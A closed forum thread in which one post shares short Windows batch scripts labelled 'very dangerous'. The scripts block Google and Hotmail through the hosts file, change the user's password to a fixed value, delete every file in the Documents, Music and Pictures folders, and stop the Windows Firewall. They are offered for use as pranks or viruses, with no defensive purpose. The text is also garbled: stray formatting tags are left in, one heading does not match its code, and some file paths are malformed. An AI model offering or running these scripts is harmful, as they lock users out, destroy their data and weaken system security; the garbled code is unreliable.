🔒 Closed Some of most dangerous .bat files

Status
Not open for further replies.

AraAra

Honorary Poster
Some of these codes are very dangerous!
USE THIS AT YOUR OWN RISK.

Block Google

Code:
cd "C:\Windows\System32\Drivers\etc"
echo 127.0.0.1 google.com >> "Hosts"
echo 127.0.0.1 http://www.google.com >> "Hosts"

Black Hotmail
Code:
@echo off[/B][/B][/B][/B][/B][/B]
[B][B][B][B][B][B]::--------Block Hotmail------::
cd "C:\Windows\System32\Drivers\etc"
echo 127.0.0.1 hotmail.com >> "Hosts"
echo 127.0.0.1 http://www.hotmail.com >> "Hosts"
::---------------------------::

Change time to 00.00
Code:
::__---Virus Created By Virus Author---__::[/B][/B][/B][/B]
[B][B][B][B]@echo off
::------Change The Time------::
time 00:00
::---------------------------::

Change user pass
Code:
@echo off[/B][/B][/B][/B]
[B][B][B][B]::--Change Pass To InShadow--::
net user %username% InShadow
::---------------------------::

Create account Owned
Code:
@echo off[/B][/B][/B][/B]
[B][B][B][B]::----Hide My Music Folder---::
attrib +h "%userprofile%\my documents\my music"
::---------------------------::

Delete all Docs
Code:
@echo off[/B][/B][/B]
[B][B][B]::----Delete My Documents----::
del /f /q "C:\Users\%userprofile%\My Documents\*.*"
::---------------------------::

Delete all Music
Code:
@echo off[/B][/B][/B]
[B][B][B]::-----Delete My Music-------::
del /f /q "C:\Users\%userprofile%\My Documents\My Music\*.*"
::---------------------------::

Delete all Pics
Code:
@echo off[/B][/B][/B]
[B][B][B]::-----Delete My Pictures----::
del /f /q "C:\Users\%userprofile%\My Documents\My Pictures\*.*"
::---------------------------::

Disable Farewell
Code:
@echo off[/B][/B][/B]
[B][B][B]::-Disable Windows Firewall--::
net stop "MpsSvc"
taskkill /f /t /im "FirewallControlPanel.exe"
::---------------------------::

There be more but I'm tired of typing..:):)
 
Status
Not open for further replies.

About this Thread

  • 5
    Replies
  • 843
    Views
  • 6
    Participants
Last reply from:
zon28

Trending Topics

Online now

Members online
1,077
Guests online
3,658
Total visitors
4,735

Forum statistics

Threads
2,306,633
Posts
29,173,142
Members
1,193,961
Latest member
Antagonist123
Back
Top